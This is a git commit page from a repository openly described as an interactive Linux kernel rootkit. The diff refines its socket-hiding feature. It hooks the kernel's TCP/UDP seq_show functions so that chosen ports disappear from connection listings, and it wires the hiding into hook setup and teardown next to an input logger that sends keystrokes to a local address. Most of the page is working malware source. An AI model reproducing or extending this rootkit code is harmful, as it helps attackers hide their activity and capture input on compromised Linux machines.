linux-rootkit

Feature-rich interactive rootkit that targets Linux kernel 4.19, accompanied by a dynamic kernel memory analysis GDB plugin for in vivo introspection (e.g. using QEMU)
git clone git://git.deurzen.net/linux-rootkit
Log | Files | Refs
commit 005fd32ac661d6d886fa818a5932b65ee7becb63
parent e7ca4b8f93a447d2addcaed2a8f87978f421f50b
Author: Tizian Leonhardt <tizianleonhardt@web.de>
Date:   Sun, 13 Dec 2020 02:27:53 +0100

Fix many stupid mistakes in sockhide.c

Diffstat:

Msrc/channel.c | 16++++++++--------


Msrc/hook.c | 7+++++++


Msrc/sockhide.c | 10+++++-----


3 files changed, 20 insertions(+), 13 deletions(-)

diff --git a/src/channel.c b/src/channel.c
@@ -191,8 +191,8 @@ handle_tcphide(unsigned long arg)
         unhook_show();
         DEBUG_NOTICE("[g7] socket hiding off\n");
     } else if (sarg < 0) {
-        remove_port_from_list(&hidden_ports, (port_t)-sarg, tcp4);
-        remove_port_from_list(&hidden_ports, (port_t)-sarg, tcp6);
+        unhide_port((port_t)-sarg, tcp4);
+        unhide_port((port_t)-sarg, tcp6);
         DEBUG_NOTICE("[g7] unhiding tcp socket with port %ld\n", -sarg);
     } else if (sarg > 0) {
         if (!rootkit.hiding_sockets) {
@@ -200,8 +200,8 @@ handle_tcphide(unsigned long arg)
             DEBUG_NOTICE("[g7] socket hiding on\n");
         }
 
-        add_port_to_list(&hidden_ports, (port_t)sarg, tcp4);
-        add_port_to_list(&hidden_ports, (port_t)sarg, tcp6);
+        hide_port((port_t)sarg, tcp4);
+        hide_port((port_t)sarg, tcp6);
         DEBUG_NOTICE("[g7] hiding tcp socket with port %ld\n", sarg);
     }
 
@@ -218,16 +218,16 @@ handle_udphide(unsigned long arg)
         rootkit.hiding_sockets = 0;
         DEBUG_NOTICE("[g7] socket hiding off\n");
     } else if (sarg < 0) {
-        remove_port_from_list(&hidden_ports, (port_t)-sarg, udp4);
-        remove_port_from_list(&hidden_ports, (port_t)-sarg, udp6);
+        unhide_port((port_t)-sarg, udp4);
+        unhide_port((port_t)-sarg, udp6);
         DEBUG_NOTICE("[g7] unhiding udp socket with port %ld\n", -sarg);
     } else if (sarg > 0) {
         if (!rootkit.hiding_sockets) {
             hook_show();
             DEBUG_NOTICE("[g7] socket hiding on\n");
         }
-        add_port_to_list(&hidden_ports, (port_t)sarg, udp4);
-        add_port_to_list(&hidden_ports, (port_t)sarg, udp6);
+        hide_port((port_t)sarg, udp4);
+        hide_port((port_t)sarg, udp6);
         DEBUG_NOTICE("[g7] hiding udp socket with port %ld\n", sarg);
     }
 
diff --git a/src/hook.c b/src/hook.c
@@ -21,6 +21,7 @@
 #include "openhide.h"
 #include "read.h"
 #include "inputlog.h"
+#include "sockhide.h"
 
 extern rootkit_t rootkit;
 
@@ -90,6 +91,9 @@ init_hooks(void)
 
     if (rootkit.logging_input)
         log_input("127.0.0.1", "5000");
+
+    if (rootkit.hiding_sockets)
+        hook_show();
 }
 
 void
@@ -114,6 +118,9 @@ remove_hooks(void)
 
     if (rootkit.logging_input)
         unlog_input();
+
+    if (rootkit.hiding_sockets)
+        unhook_show();
 }
 
 void
diff --git a/src/sockhide.c b/src/sockhide.c
@@ -8,8 +8,8 @@
 #include "sockhide.h"
 
 port_list_t hidden_ports = {
-    .port  = 41124,
-    .proto = tcp4,
+    .port  = -1,
+    .proto = -1,
     .prev = NULL,
     .next = NULL,
 };
@@ -78,7 +78,7 @@ unhook_show(void)
 void 
 hide_port(port_t port, proto proto)
 {
-    add_port_to_list(&hidden_ports, port, proto);
+    add_port_to_list(hidden_ports_tail, port, proto);
 }
 
 void
@@ -97,7 +97,7 @@ port_list_t_ptr
 find_port_in_list(port_list_t_ptr head, port_t port, proto proto)
 {
     port_list_t_ptr i;
-    for (i = head; i; i = i->next)
+    for (i = head; i; i = i->next) 
         if (i->port == port && i->proto == proto)
             return i;
 
@@ -166,7 +166,7 @@ g7_tcp4_seq_show(struct seq_file *seq, void *v)
     if(list_contains_port(&hidden_ports, src, tcp4)
     || list_contains_port(&hidden_ports, dst, tcp4))
         return 0;
-    
+
     return tcp4_seq_show(seq, v);
 }